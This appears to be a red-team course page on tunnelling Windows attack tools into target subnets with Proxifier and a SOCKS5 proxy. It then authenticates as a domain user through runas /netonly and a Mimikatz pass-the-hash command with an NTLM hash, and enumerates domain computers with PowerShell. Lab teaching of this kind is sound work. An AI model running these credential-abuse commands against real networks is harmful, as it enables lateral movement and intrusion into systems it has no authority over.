Windows Tools

To tunnel traffic from our Windows machine we will use Proxifier (https://www.proxifier.com/).

To create a new proxy entry, go to Profile > Proxy Servers. Click Add and enter the relevant details.

When asked whether to use this proxy by default, select No, but select Yes when prompted to go to the Proxification Rules. Here, we tell Proxifier which applications to proxy and under what conditions.

Click Add to create a new rule and use the following:

  • Name: Tools

  • Applications: Any

  • Target hosts: 10.10.120.0/24;10.10.122.0/24

  • Target ports: Any

  • Action: Proxy SOCKS5 10.10.5.50
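To see which destinations the Tools rule actually covers, this added example (not part of the original page and not Proxifier's own matching logic) evaluates IPv4 addresses against the rule's Target hosts list. The function names and the sample destinations are constructed, and it assumes the list contains only IPv4 CIDR entries or bare addresses.

```powershell
# Added example, not Proxifier code. Function names are hypothetical.
# Handles only IPv4 CIDR entries (or bare IPv4 addresses), as used in the rule above.
$TargetHosts = '10.10.120.0/24;10.10.122.0/24'   # "Target hosts" value from the Tools rule

function ConvertTo-IPv4Number {
    param([Parameter(Mandatory)][string]$Address)
    $ip = [System.Net.IPAddress]::Parse($Address)
    if ($ip.AddressFamily -ne 'InterNetwork') { throw "IPv4 only: $Address" }
    $b = $ip.GetAddressBytes()
    # Use double arithmetic so the high octet cannot overflow a signed 32-bit int.
    return [double]$b[0] * 16777216 + [double]$b[1] * 65536 + [double]$b[2] * 256 + [double]$b[3]
}

function Test-RuleMatch {
    param(
        [Parameter(Mandatory)][string]$Destination,
        [string]$Rule = $TargetHosts
    )
    $dest    = ConvertTo-IPv4Number $Destination
    $entries = $Rule.Split(';') | Where-Object { $_.Trim() }
    foreach ($entry in $entries) {
        $network, $prefix = $entry.Trim().Split('/')
        if ($null -eq $prefix) { $prefix = 32 }       # bare address = single host
        $prefix = [int]$prefix
        if ($prefix -lt 0 -or $prefix -gt 32) { throw "Bad prefix in '$entry'" }
        $block = [math]::Pow(2, 32 - $prefix)         # number of addresses per network
        $net   = ConvertTo-IPv4Number $network
        # Two addresses share a network when they fall in the same block of that size.
        if ([math]::Floor($dest / $block) -eq [math]::Floor($net / $block)) { return $true }
    }
    return $false
}

# Constructed sample destinations; only 10.10.122.10 and 10.10.5.50 appear on the page.
'10.10.122.10', '10.10.120.25', '10.10.121.10', '10.10.5.50' | ForEach-Object {
    [pscustomobject]@{
        Destination = $_
        Action      = if (Test-RuleMatch $_) { 'Proxy SOCKS5 10.10.5.50' } else { 'Not matched by the Tools rule' }
    }
}
```

Addresses that fall between the two /24 ranges, and the proxy address itself, are not matched by the rule.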

For authentication to occur over the proxy, the application must be launched as a user from the target domain. This can be achieved using runas /netonly or Mimikatz.

PS C:\Users\Attacker> runas /netonly /user:DEV\bfarmer mmc.exe

To achieve the same with Mimikatz:

mimikatz # privilege::debug

mimikatz # sekurlsa::pth /domain:DEV /user:bfarmer /ntlm:4ea24377a53e67e78b2bd853974420fc /run:mmc.exe

PowerShell cmdlets that support credential objects can also be used.

PS C:\Users\Attacker> $cred = Get-Credential

PS C:\Users\Attacker> Get-ADComputer -Server 10.10.122.10 -Filter * -Credential $cred | select DNSHostName
